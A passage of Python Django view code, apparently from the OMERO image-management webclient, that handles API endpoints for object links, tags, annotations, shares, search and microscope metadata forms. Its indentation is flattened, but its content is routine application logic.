conn=conn, screen_id=screen_id, group_id=group_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"plates": plates})
@login_required()
def api_plate_acquisition_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
plate_id = get_long_or_default(request, "id", None)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# Orphaned PlateAcquisitions are not possible so querying without a
# plate is an error
if plate_id is None:
return HttpResponseBadRequest("id (plate) must be specified")
try:
# Get the plate acquisitions
plate_acquisitions = tree.marshal_plate_acquisitions(
conn=conn, plate_id=plate_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"acquisitions": plate_acquisitions})
def get_object_links(conn, parent_type, parent_id, child_type, child_ids):
""" This is just used internally by api_link DELETE below """
if parent_type == "orphaned":
return None
link_type = None
if parent_type == "experimenter":
if child_type in ["dataset", "plate", "tag"]:
# This will be a requested link if a dataset or plate is
# moved from the de facto orphaned datasets/plates, it isn't
# an error, but no link actually needs removing
return None
elif parent_type == "project":
if child_type == "dataset":
link_type = "ProjectDatasetLink"
elif parent_type == "dataset":
if child_type == "image":
link_type = "DatasetImageLink"
elif parent_type == "screen":
if child_type == "plate":
link_type = "ScreenPlateLink"
elif parent_type == "tagset":
if child_type == "tag":
link_type = "AnnotationAnnotationLink"
if not link_type:
raise Http404("json data needs 'parent_type' and 'child_type'")
params = omero.sys.ParametersI()
params.addIds(child_ids)
qs = conn.getQueryService()
# Need to fetch child and parent, otherwise
# AnnotationAnnotationLink is not loaded
q = (
"""
from %s olink join fetch olink.child join fetch olink.parent
where olink.child.id in (:ids)
"""
% link_type
)
if parent_id:
params.add("pid", rlong(parent_id))
q += " and olink.parent.id = :pid"
res = qs.findAllByQuery(q, params, conn.SERVICE_OPTS)
if parent_id is not None and len(res) == 0:
raise Http404(
"No link found for %s-%s to %s-%s"
% (parent_type, parent_id, child_type, child_ids)
)
return link_type, res
def create_link(parent_type, parent_id, child_type, child_id):
""" This is just used internally by api_link DELETE below """
if parent_type == "experimenter":
if child_type == "dataset" or child_type == "plate":
# This is actually not a link that needs creating, this
# dataset/plate is an orphan
return "orphan"
if parent_type == "project":
project = ProjectI(long(parent_id), False)
if child_type == "dataset":
dataset = DatasetI(long(child_id), False)
link = ProjectDatasetLinkI()
link.setParent(project)
link.setChild(dataset)
return link
elif parent_type == "dataset":
dataset = DatasetI(long(parent_id), False)
if child_type == "image":
image = ImageI(long(child_id), False)
link = DatasetImageLinkI()
link.setParent(dataset)
link.setChild(image)
return link
elif parent_type == "screen":
screen = ScreenI(long(parent_id), False)
if child_type == "plate":
plate = PlateI(long(child_id), False)
link = ScreenPlateLinkI()
link.setParent(screen)
link.setChild(plate)
return link
elif parent_type == "tagset":
if child_type == "tag":
link = AnnotationAnnotationLinkI()
link.setParent(TagAnnotationI(long(parent_id), False))
link.setChild(TagAnnotationI(long(child_id), False))
return link
return None
def get_objects_owners(conn, child_type, child_ids):
"""
Returns a dict of child_id: owner_id
"""
if child_type == "tag":
child_type = "Annotation"
owners = {}
for obj in conn.getObjects(child_type, child_ids):
owners[obj.id] = obj.details.owner.id.val
return owners
@login_required()
def api_links(request, conn=None, **kwargs):
"""
Entry point for the api_links methods.
We delegate depending on request method to
create or delete links between objects.
"""
if request.method not in ["POST", "DELETE"]:
return JsonResponse(
{"Error": "Need to POST or DELETE JSON data to update links"}, status=405
)
# Handle link creation/deletion
try:
json_data = json.loads(request.body)
except TypeError:
# for Python 3.5
json_data = json.loads(bytes_to_native_str(request.body))
if request.method == "POST":
return _api_links_POST(conn, json_data)
elif request.method == "DELETE":
return _api_links_DELETE(conn, json_data)
def _api_links_POST(conn, json_data, **kwargs):
"""Creates links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
When creating a link, fails silently if ValidationException
(E.g. adding an image to a Dataset that already has that image).
"""
response = {"success": False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
linksToSave = []
write_owned = "WriteOwned" in conn.getCurrentAdminPrivileges()
user_id = conn.getUserId()
for parent_type, parents in json_data.items():
if parent_type in ("orphaned", "experimenter"):
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
# batch look-up owners of all child objects
child_owners = get_objects_owners(conn, child_type, child_ids)
for child_id in child_ids:
parent_id = int(parent_id)
link = create_link(parent_type, parent_id, child_type, child_id)
if link and link != "orphan":
# link owner should match child owner
if write_owned and child_owners[child_id] != user_id:
link.details.owner = ExperimenterI(
child_owners[child_id], False
)
linksToSave.append(link)
if len(linksToSave) > 0:
# Need to set context to correct group (E.g parent group)
ptype = parent_type.title()
if ptype in ["Tagset", "Tag"]:
ptype = "TagAnnotation"
p = conn.getQueryService().get(ptype, parent_id, conn.SERVICE_OPTS)
conn.SERVICE_OPTS.setOmeroGroup(p.details.group.id.val)
logger.info("api_link: Saving %s links" % len(linksToSave))
try:
# We try to save all at once, for speed.
conn.saveArray(linksToSave)
response["success"] = True
except Exception:
logger.info(
"api_link: Exception on saveArray with %s links" % len(linksToSave)
)
# If this fails, e.g. ValidationException because link
# already exists, try to save individual links
for link in linksToSave:
try:
conn.saveObject(link)
except Exception:
pass
response["success"] = True
return JsonResponse(response)
def _api_links_DELETE(conn, json_data):
"""Deletes links between objects specified by a json
blob in the request body.
e.g. {"dataset":{"10":{"image":[1,2,3]}}}
"""
response = {"success": False}
# json is [parent_type][parent_id][child_type][childIds]
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for parent_type, parents in json_data.items():
if parent_type == "orphaned":
continue
for parent_id, children in parents.items():
for child_type, child_ids in children.items():
objLnks = get_object_links(
conn, parent_type, parent_id, child_type, child_ids
)
if objLnks is None:
continue
linkType, links = objLnks
linkIds = [r.id.val for r in links]
logger.info("api_link: Deleting %s links" % len(linkIds))
conn.deleteObjects(linkType, linkIds, wait=True)
# webclient needs to know what is orphaned
linkType, remainingLinks = get_object_links(
conn, parent_type, None, child_type, child_ids
)
# return remaining links in same format as json above
# e.g. {"dataset":{"10":{"image":[1,2,3]}}}
for rl in remainingLinks:
pid = rl.parent.id.val
cid = rl.child.id.val
# Deleting links still in progress above - ignore these
if pid == int(parent_id):
continue
if parent_type not in response:
response[parent_type] = {}
if pid not in response[parent_type]:
response[parent_type][pid] = {child_type: []}
response[parent_type][pid][child_type].append(cid)
# If we got here, DELETE was OK
response["success"] = True
return JsonResponse(response)
@login_required()
def api_parent_links(request, conn=None, **kwargs):
"""
Get a list of links as
{'data': [{id: 12, child:{type:'image', id:1},
parent:{type:'dataset', id:2}] }
Supports ?image=1,2 and ?image=1&image=2
"""
parent_types = {"image": "dataset", "dataset": "project", "plate": "screen"}
parents = []
for child_type, parent_type in parent_types.items():
ids = request.GET.getlist(child_type)
if len(ids) == 0:
continue
# support for ?image=1,2
child_ids = []
for id in ids:
for i in id.split(","):
child_ids.append(i)
link_type, result = get_object_links(
conn, parent_type, None, child_type, child_ids
)
for link in result:
parents.append(
{
"id": link.id.val,
"parent": {"type": parent_type, "id": link.parent.id.val},
"child": {"type": child_type, "id": link.child.id.val},
}
)
return JsonResponse({"data": parents})
@login_required()
def api_paths_to_object(request, conn=None, **kwargs):
"""
This finds the paths to objects in the hierarchy. It returns only
the path, not the object hierarchy itself.
An example usage is for the 'show' functionality
Example to go to the image with id 1 somewhere in the tree.
http://localhost:8000/webclient/?show=image-1
This method can tell the webclient exactly what needs to be
dynamically loaded to display this in the jstree.
"""
try:
experimenter_id = get_long_or_default(request, "experimenter", None)
project_id = get_long_or_default(request, "project", None)
dataset_id = get_long_or_default(request, "dataset", None)
image_id = get_long_or_default(request, "image", None)
screen_id = get_long_or_default(request, "screen", None)
plate_id = get_long_or_default(request, "plate", None)
acquisition_id = get_long_or_default(request, "run", None)
# acquisition will override 'run' if both are specified as they are
# the same thing
acquisition_id = get_long_or_default(request, "acquisition", acquisition_id)
well_id = request.GET.get("well", None)
tag_id = get_long_or_default(request, "tag", None)
tagset_id = get_long_or_default(request, "tagset", None)
roi_id = get_long_or_default(request, "roi", None)
shape_id = get_long_or_default(request, "shape", None)
group_id = get_long_or_default(request, "group", None)
page_size = get_long_or_default(request, "page_size", settings.PAGE)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if tag_id is not None or tagset_id is not None:
paths = paths_to_tag(conn, experimenter_id, tagset_id, tag_id)
else:
paths = paths_to_object(
conn,
experimenter_id,
project_id,
dataset_id,
image_id,
screen_id,
plate_id,
acquisition_id,
well_id,
group_id,
page_size,
roi_id,
shape_id,
)
return JsonResponse({"paths": paths})
@login_required()
def api_tags_and_tagged_list(request, conn=None, **kwargs):
if request.method == "GET":
return api_tags_and_tagged_list_GET(request, conn, **kwargs)
elif request.method == "DELETE":
return api_tags_and_tagged_list_DELETE(request, conn, **kwargs)
def api_tags_and_tagged_list_GET(request, conn=None, **kwargs):
"""Get a list of tags
Specifiying tag_id will return any sub-tags, sub-tagsets and
objects tagged with that id
If no tagset_id is specifed it will return tags which have no
parent
"""
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
group_id = get_long_or_default(request, "group", -1)
tag_id = get_long_or_default(request, "id", None)
experimenter_id = get_long_or_default(request, "experimenter_id", -1)
orphaned = get_bool_or_default(request, "orphaned", False)
load_pixels = get_bool_or_default(request, "sizeXYZ", False)
date = get_bool_or_default(request, "date", False)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
# Get ALL data (all owners) under specified tags
if tag_id is not None:
tagged = tree.marshal_tagged(
conn=conn,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
load_pixels=load_pixels,
date=date,
limit=limit,
)
else:
tagged = {}
# Get 'tags' under tag_id
tagged["tags"] = tree.marshal_tags(
conn=conn,
orphaned=orphaned,
experimenter_id=experimenter_id,
tag_id=tag_id,
group_id=group_id,
page=page,
limit=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(tagged)
def api_tags_and_tagged_list_DELETE(request, conn=None, **kwargs):
"""Delete the listed tags by ids"""
# Get parameters
try:
tag_ids = get_longs(request, "id")
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
dcs = list()
handle = None
try:
for tag_id in tag_ids:
dcs.append(omero.cmd.Delete("/Annotation", tag_id))
doall = omero.cmd.DoAll()
doall.requests = dcs
handle = conn.c.sf.submit(doall, conn.SERVICE_OPTS)
try:
conn._waitOnCmd(handle)
finally:
handle.close()
except CmdError as e:
return HttpResponseBadRequest(e.message)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse("")
@login_required()
def api_annotations(request, conn=None, **kwargs):
r = request.GET
image_ids = get_list(request, "image")
dataset_ids = get_list(request, "dataset")
project_ids = get_list(request, "project")
screen_ids = get_list(request, "screen")
plate_ids = get_list(request, "plate")
run_ids = get_list(request, "acquisition")
well_ids = get_list(request, "well")
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", ANNOTATIONS_LIMIT)
ann_type = r.get("type", None)
ns = r.get("ns", None)
anns, exps = tree.marshal_annotations(
conn,
project_ids=project_ids,
dataset_ids=dataset_ids,
image_ids=image_ids,
screen_ids=screen_ids,
plate_ids=plate_ids,
run_ids=run_ids,
well_ids=well_ids,
ann_type=ann_type,
ns=ns,
page=page,
limit=limit,
)
return JsonResponse({"annotations": anns, "experimenters": exps})
@login_required()
def api_share_list(request, conn=None, **kwargs):
# Get parameters
try:
page = get_long_or_default(request, "page", 1)
limit = get_long_or_default(request, "limit", settings.PAGE)
member_id = get_long_or_default(request, "member_id", -1)
owner_id = get_long_or_default(request, "owner_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
# Like with api_container_list, this is a combination of
# results which will each be able to return up to the limit in page
# size
try:
# Get the shares
shares = tree.marshal_shares(
conn=conn, member_id=member_id, owner_id=owner_id, page=page, limit=limit
)
# Get the discussions
discussions = tree.marshal_discussions(
conn=conn, member_id=member_id, owner_id=owner_id, page=page, limit=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"shares": shares, "discussions": discussions})
@login_required()
@render_response()
def load_plate(request, o1_type=None, o1_id=None, conn=None, **kwargs):
"""
This loads data for the center panel, via AJAX calls.
Used for Datasets, Plates & Orphaned Images.
"""
# get index of the plate
index = getIntOrDefault(request, "index", 0)
# prepare data. E.g. kw = {} or {'plate': 301L} or
# 'acquisition': 301L}
kw = dict()
if o1_type is not None:
if o1_id is not None and int(o1_id) > 0:
kw[str(o1_type)] = long(o1_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
# prepare forms
form_well_index = None
context = {"manager": manager, "form_well_index": form_well_index, "index": index}
# load data & template
template = None
if "plate" in kw or "acquisition" in kw:
fields = manager.getNumberOfFields()
if fields is not None:
form_well_index = WellIndexForm(initial={"index": index, "range": fields})
if index == 0:
index = fields[0]
# Show parameter will be well-1|well-2
show = request.GET.get("show")
if show is not None:
wells_to_select = []
for w in show.split("|"):
if "well-" in w:
wells_to_select.append(w.replace("well-", ""))
context["select_wells"] = ",".join(wells_to_select)
context["baseurl"] = reverse("webgateway").rstrip("/")
context["form_well_index"] = form_well_index
context["index"] = index
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
template = "webclient/data/plate.html"
if o1_type == "acquisition":
context["acquisition"] = o1_id
context["isLeader"] = conn.isLeader()
context["template"] = template
return context
@login_required()
@render_response()
def load_chgrp_groups(request, conn=None, **kwargs):
"""
Get the potential groups we can move selected data to.
These will be groups that the owner(s) of selected objects is a member of.
Objects are specified by query string like: ?Image=1,2&Dataset=3
If no selected objects are specified, simply list the groups that the
current user is a member of.
Groups list will exclude the 'current' group context.
"""
ownerIds = []
currentGroups = set()
groupSets = []
groups = {}
owners = {}
for dtype in ("Project", "Dataset", "Image", "Screen", "Plate"):
oids = request.GET.get(dtype, None)
if oids is not None:
for o in conn.getObjects(dtype, oids.split(",")):
ownerIds.append(o.getDetails().owner.id.val)
currentGroups.add(o.getDetails().group.id.val)
ownerIds = list(set(ownerIds))
# In case we were passed no objects or they weren't found
if len(ownerIds) == 0:
ownerIds = [conn.getUserId()]
for owner in conn.getObjects(
"Experimenter", ownerIds, opts={"load_experimentergroups": True}
):
# Each owner has a set of groups
gids = []
owners[owner.id] = owner.getFullName()
for group in owner.copyGroupExperimenterMap():
groups[group.parent.id.val] = group.parent
gids.append(group.parent.id.val)
groupSets.append(set(gids))
# Can move to groups that all owners are members of...
targetGroupIds = set.intersection(*groupSets)
# ...but not 'user' group
userGroupId = conn.getAdminService().getSecurityRoles().userGroupId
if userGroupId in targetGroupIds:
targetGroupIds.remove(userGroupId)
# if all the Objects are in a single group, exclude it from the target
# groups
if len(currentGroups) == 1:
curr_grp = currentGroups.pop()
if curr_grp in targetGroupIds:
targetGroupIds.remove(curr_grp)
def getPerms(group):
p = group.getDetails().permissions
return {
"write": p.isGroupWrite(),
"annotate": p.isGroupAnnotate(),
"read": p.isGroupRead(),
}
# From groupIds, create a list of group dicts for json
targetGroups = []
for gid in targetGroupIds:
targetGroups.append(
{"id": gid, "name": groups[gid].name.val, "perms": getPerms(groups[gid])}
)
targetGroups.sort(key=lambda x: x["name"])
owners = [[k, v] for k, v in owners.items()]
return {"owners": owners, "groups": targetGroups}
@login_required()
@render_response()
def load_chgrp_target(request, group_id, target_type, conn=None, **kwargs):
""" Loads a tree for user to pick target Project, Dataset or Screen """
# filter by group (not switching group)
conn.SERVICE_OPTS.setOmeroGroup(int(group_id))
owner = getIntOrDefault(request, "owner", None)
manager = BaseContainer(conn)
manager.listContainerHierarchy(owner)
template = "webclient/data/chgrp_target_tree.html"
context = {"manager": manager, "target_type": target_type, "template": template}
return context
@login_required()
@render_response()
def load_searching(request, form=None, conn=None, **kwargs):
"""
Handles AJAX calls to search
"""
manager = BaseSearch(conn)
foundById = []
# form = 'form' if we are searching. Get query from request...
r = request.GET
if form is not None:
query_search = r.get("query", None)
if query_search is None:
return HttpResponse("No search '?query' included")
query_search = query_search.replace("+", " ")
advanced = toBoolean(r.get("advanced"))
# If this is an advanced search use 'advanced_search' for query
if advanced:
query_search = r.get("advanced_search")
template = "webclient/search/search_details.html"
onlyTypes = r.getlist("datatype")
fields = r.getlist("field")
searchGroup = r.get("searchGroup", None)
ownedBy = r.get("ownedBy", None)
useAcquisitionDate = toBoolean(r.get("useAcquisitionDate"))
startdate = r.get("startdateinput", None)
startdate = startdate is not None and smart_str(startdate) or None
enddate = r.get("enddateinput", None)
enddate = enddate is not None and smart_str(enddate) or None
date = None
if startdate is not None:
if enddate is None:
n = datetime.datetime.now()
enddate = "%s-%02d-%02d" % (n.year, n.month, n.day)
date = "%s_%s" % (startdate, enddate)
# by default, if user has not specified any types:
if len(onlyTypes) == 0:
onlyTypes = ["images"]
# search is carried out and results are stored in
# manager.containers.images etc.
manager.search(
query_search,
onlyTypes,
fields,
searchGroup,
ownedBy,
useAcquisitionDate,
date,
rawQuery=advanced,
)
# if the query is only numbers (separated by commas or spaces)
# we search for objects by ID
isIds = re.compile(r"^[\d ,]+$")
if isIds.search(query_search) is not None:
conn.SERVICE_OPTS.setOmeroGroup(-1)
idSet = set()
for queryId in re.split(" |,", query_search):
if len(queryId) == 0:
continue
try:
searchById = long(queryId)
if searchById in idSet:
continue
idSet.add(searchById)
for t in onlyTypes:
t = t[0:-1] # remove 's'
if t in (
"project",
"dataset",
"image",
"screen",
"plate",
"well",
):
obj = conn.getObject(t, searchById)
if obj is not None:
foundById.append({"otype": t, "obj": obj})
except ValueError:
pass
else:
# simply display the search home page.
template = "webclient/search/search.html"
context = {
"manager": manager,
"foundById": foundById,
"resultCount": manager.c_size + len(foundById),
}
context["template"] = template
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
return context
@login_required()
@render_response()
def load_metadata_details(request, c_type, c_id, conn=None, share_id=None, **kwargs):
"""
This page is the right-hand panel 'general metadata', first tab only.
Shown for Projects, Datasets, Images, Screens, Plates, Wells, Tags etc.
The data and annotations are loaded by the manager. Display of appropriate
data is handled by the template.
"""
# the index of a field within a well
index = getIntOrDefault(request, "index", 0)
context = dict()
# we only expect a single object, but forms can take multiple objects
images = c_type == "image" and list(conn.getObjects("Image", [c_id])) or list()
datasets = (
c_type == "dataset" and list(conn.getObjects("Dataset", [c_id])) or list()
)
projects = (
c_type == "project" and list(conn.getObjects("Project", [c_id])) or list()
)
screens = c_type == "screen" and list(conn.getObjects("Screen", [c_id])) or list()
plates = c_type == "plate" and list(conn.getObjects("Plate", [c_id])) or list()
acquisitions = (
c_type == "acquisition"
and list(conn.getObjects("PlateAcquisition", [c_id]))
or list()
)
shares = (
(c_type == "share" or c_type == "discussion")
and [conn.getShare(c_id)]
or list()
)
wells = c_type == "well" and list(conn.getObjects("Well", [c_id])) or list()
# we simply set up the annotation form, passing the objects to be
# annotated.
selected = {
"images": c_type == "image" and [c_id] or [],
"datasets": c_type == "dataset" and [c_id] or [],
"projects": c_type == "project" and [c_id] or [],
"screens": c_type == "screen" and [c_id] or [],
"plates": c_type == "plate" and [c_id] or [],
"acquisitions": c_type == "acquisition" and [c_id] or [],
"wells": c_type == "well" and [c_id] or [],
"shares": ((c_type == "share" or c_type == "discussion") and [c_id] or []),
}
initial = {
"selected": selected,
"images": images,
"datasets": datasets,
"projects": projects,
"screens": screens,
"plates": plates,
"acquisitions": acquisitions,
"wells": wells,
"shares": shares,
}
form_comment = None
figScripts = None
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
form_comment = CommentAnnotationForm(initial=initial)
else:
try:
manager = BaseContainer(conn, **{str(c_type): long(c_id), "index": index})
except AttributeError as x:
return handlerInternalError(request, x)
if share_id is not None:
template = "webclient/annotations/annotations_share.html"
context["share"] = BaseShare(conn, share_id)
else:
template = "webclient/annotations/metadata_general.html"
context["canExportAsJpg"] = manager.canExportAsJpg(request)
context["annotationCounts"] = manager.getAnnotationCounts()
figScripts = manager.listFigureScripts()
context["manager"] = manager
if c_type in ("tag", "tagset"):
context["insight_ns"] = omero.rtypes.rstring(
omero.constants.metadata.NSINSIGHTTAGSET
).val
if form_comment is not None:
context["form_comment"] = form_comment
context["figScripts"] = figScripts
context["template"] = template
context["webclient_path"] = reverse("webindex")
return context
@login_required()
@render_response()
def load_metadata_preview(request, c_type, c_id, conn=None, share_id=None, **kwargs):
"""
This is the image 'Preview' tab for the right-hand panel.
"""
context = {}
# the index of a field within a well
index = getIntOrDefault(request, "index", 0)
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
if share_id:
context["share"] = BaseShare(conn, share_id)
if c_type == "well":
manager.image = manager.well.getImage(index)
allRdefs = manager.image.getAllRenderingDefs()
rdefs = {}
rdefId = manager.image.getRenderingDefId()
# remove duplicates per user
for r in allRdefs:
ownerId = r["owner"]["id"]
r["current"] = r["id"] == rdefId
# if duplicate rdefs for user, pick one with highest ID
if ownerId not in rdefs or rdefs[ownerId]["id"] < r["id"]:
rdefs[ownerId] = r
rdefs = rdefs.values()
# format into rdef strings,
# E.g. {c: '1|3118:35825$FF0000,2|2086:18975$FFFF00', m: 'c'}
rdefQueries = []
for r in rdefs:
chs = []
for i, c in enumerate(r["c"]):
act = "-"
if c["active"]:
act = ""
color = c["lut"] if "lut" in c else c["color"]
reverse = "r" if c["inverted"] else "-r"
chs.append(
"%s%s|%s:%s%s$%s" % (act, i + 1, c["start"], c["end"], reverse, color)
)
rdefQueries.append(
{
"id": r["id"],
"owner": r["owner"],
"c": ",".join(chs),
"m": r["model"] == "greyscale" and "g" or "c",
}
)
max_w, max_h = conn.getMaxPlaneSize()
size_x = manager.image.getSizeX()
size_y = manager.image.getSizeY()
context["tiledImage"] = (size_x * size_y) > (max_w * max_h)
context["manager"] = manager
context["rdefsJson"] = json.dumps(rdefQueries)
context["rdefs"] = rdefs
context["template"] = "webclient/annotations/metadata_preview.html"
return context
@login_required()
@render_response()
def load_metadata_hierarchy(request, c_type, c_id, conn=None, **kwargs):
"""
This loads the ancestors of the specified object and displays them in a
static tree.
Used by an AJAX call from the metadata_general panel.
"""
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
context = {"manager": manager}
context["template"] = "webclient/annotations/metadata_hierarchy.html"
return context
@login_required()
@render_response()
def load_metadata_acquisition(
request, c_type, c_id, conn=None, share_id=None, **kwargs
):
"""
The acquisition tab of the right-hand panel. Only loaded for images.
TODO: urls regex should make sure that c_type is only 'image' OR 'well'
"""
try:
if c_type in ("share", "discussion"):
template = "webclient/annotations/annotations_share.html"
manager = BaseShare(conn, c_id)
manager.getAllUsers(c_id)
manager.getComments(c_id)
else:
template = "webclient/annotations/metadata_acquisition.html"
manager = BaseContainer(conn, **{str(c_type): long(c_id)})
except AttributeError as x:
return handlerInternalError(request, x)
form_environment = None
form_objective = None
form_microscope = None
form_instrument_objectives = list()
form_stageLabel = None
form_filters = list()
form_dichroics = list()
form_detectors = list()
form_channels = list()
form_lasers = list()
lasertypes = list(conn.getEnumerationEntries("LaserType"))
arctypes = list(conn.getEnumerationEntries("ArcType"))
filamenttypes = list(conn.getEnumerationEntries("FilamentType"))
# various enums we need for the forms (don't load unless needed)
mediums = None
immersions = None
corrections = None
if c_type == "image":
if share_id is None:
manager.companionFiles()
manager.channelMetadata()
for theC, ch in enumerate(manager.channel_metadata):
logicalChannel = ch.getLogicalChannel()
if logicalChannel is not None:
channel = dict()
channel["form"] = MetadataChannelForm(
initial={
"logicalChannel": logicalChannel,
"exWave": ch.getExcitationWave(units=True),
"emWave": ch.getEmissionWave(units=True),
"illuminations": list(
conn.getEnumerationEntries("IlluminationI")
),
"contrastMethods": list(
conn.getEnumerationEntries("ContrastMethodI")
),
"modes": list(conn.getEnumerationEntries("AcquisitionModeI")),
}
)
# 9853 Much metadata is not available to 'shares'
if share_id is None:
lightPath = logicalChannel.getLightPath()
if lightPath is not None:
channel["form_dichroic"] = None
channel["form_excitation_filters"] = list()
channel["form_emission_filters"] = list()
lightPathDichroic = lightPath.getDichroic()
if lightPathDichroic is not None:
channel["form_dichroic"] = MetadataDichroicForm(
initial={"dichroic": lightPathDichroic}
)
filterTypes = list(conn.getEnumerationEntries("FilterTypeI"))
for f in lightPath.getEmissionFilters():
channel["form_emission_filters"].append(
MetadataFilterForm(
initial={"filter": f, "types": filterTypes}
)
)
for f in lightPath.getExcitationFilters():
channel["form_excitation_filters"].append(
MetadataFilterForm(
initial={"filter": f, "types": filterTypes}
)
)
detectorSettings = logicalChannel.getDetectorSettings()
if (
detectorSettings._obj is not None
and detectorSettings.getDetector()
):
channel["form_detector_settings"] = MetadataDetectorForm(
initial={
"detectorSettings": detectorSettings,
"detector": detectorSettings.getDetector(),
"types": list(
conn.getEnumerationEntries("DetectorTypeI")
),
"binnings": list(conn.getEnumerationEntries("Binning")),
}
)
lightSourceSettings = logicalChannel.getLightSourceSettings()
if (
lightSourceSettings is not None
and lightSourceSettings._obj is not None
):
lightSrc = lightSourceSettings.getLightSource()
if lightSrc is not None:
lstypes = lasertypes
if lightSrc.OMERO_CLASS == "Arc":
lstypes = arctypes
elif lightSrc.OMERO_CLASS == "Filament":
lstypes = filamenttypes
channel["form_light_source"] = MetadataLightSourceForm(
initial={
"lightSource": lightSrc,
"lightSourceSettings": lightSourceSettings,
"lstypes": lstypes,
"mediums": list(
conn.getEnumerationEntries("LaserMediumI")
),
"pulses": list(
conn.getEnumerationEntries("PulseI")
),
}
)
# TODO: We don't display filter sets here yet since they are
# not populated on Import by BioFormats.
channel["label"] = ch.getLabel()
color = ch.getColor()
channel["color"] = color is not None and color.getHtml() or None
planeInfo = (
manager.image
and manager.image.getPrimaryPixels().copyPlaneInfo(
theC=theC, theZ=0
)
)
plane_info = []
for pi in planeInfo:
deltaT = pi.getDeltaT(units="SECOND")
exposure = pi.getExposureTime(units="SECOND")
if deltaT is None and exposure is None:
continue
if deltaT is not None:
deltaT = deltaT.getValue()
if exposure is not None:
exposure = exposure.getValue()
plane_info.append(
{"theT": pi.theT, "deltaT": deltaT, "exposureTime": exposure}
)
channel["plane_info"] = plane_info
form_channels.append(channel)
try:
image = manager.well.getWellSample().image()
except Exception:
image = manager.image
if share_id is None: # 9853
if image.getObjectiveSettings() is not None:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(conn.getEnumerationEntries("CorrectionI"))
form_objective = MetadataObjectiveSettingsForm(
initial={
"objectiveSettings": image.getObjectiveSettings(),
"objective": image.getObjectiveSettings().getObjective(),
"mediums": mediums,
"immersions": immersions,
"corrections": corrections,
}
)
if image.getImagingEnvironment() is not None:
form_environment = MetadataEnvironmentForm(initial={"image": image})
if image.getStageLabel() is not None:
form_stageLabel = MetadataStageLabelForm(initial={"image": image})
instrument = image.getInstrument()
if instrument is not None:
if instrument.getMicroscope() is not None:
form_microscope = MetadataMicroscopeForm(
initial={
"microscopeTypes": list(
conn.getEnumerationEntries("MicroscopeTypeI")
),
"microscope": instrument.getMicroscope(),
}
)
objectives = instrument.getObjectives()
for o in objectives:
# load the enums if needed and create our Objective Form
if mediums is None:
mediums = list(conn.getEnumerationEntries("MediumI"))
if immersions is None:
immersions = list(conn.getEnumerationEntries("ImmersionI"))
if corrections is None:
corrections = list(conn.getEnumerationEntries("CorrectionI"))
obj_form = MetadataObjectiveForm(
initial={
"objective": o,
"mediums": mediums,
"immersions": immersions,
"corrections": corrections,
}
)
form_instrument_objectives.append(obj_form)
filters = list(instrument.getFilters())
if len(filters) > 0:
for f in filters:
form_filter = MetadataFilterForm(
initial={
"filter": f,
"types": list(
conn.getEnumerationEntries("FilterTypeI")
),
}
)
form_filters.append(form_filter)
dichroics = list(instrument.getDichroics())
for d in dichroics:
form_dichroic = MetadataDichroicForm(initial={"dichroic": d})
form_dichroics.append(form_dichroic)
detectors = list(instrument.getDetectors())
if len(detectors) > 0:
for d in detectors:
form_detector = MetadataDetectorForm(
initial={
"detectorSettings": None,
"detector": d,
"types": list(
conn.getEnumerationEntries("DetectorTypeI")
),
}
)
form_detectors.append(form_detector)
lasers = list(instrument.getLightSources())
if len(lasers) > 0:
for laser in lasers:
lstypes = lasertypes
if laser.OMERO_CLASS == "Arc":
lstypes = arctypes
elif laser.OMERO_CLASS == "Filament":
lstypes = filamenttypes
form_laser = MetadataLightSourceForm(
initial={
"lightSource": laser,
"lstypes": lstypes,
"mediums": list(
conn.getEnumerationEntries("LaserMediumI")
),
"pulses": list(conn.getEnumerationEntries("PulseI")),
}
)
form_lasers.append(form_laser)
# TODO: remove this 'if' since we should only have c_type = 'image'?
context = {"manager": manager, "share_id": share_id}
if c_type not in ("share", "discussion", "tag"):
context["form_channels"] = form_channels
context["form_environment"] = form_environment
context["form_objective"] = form_objective
context["form_microscope"] = form_microscope
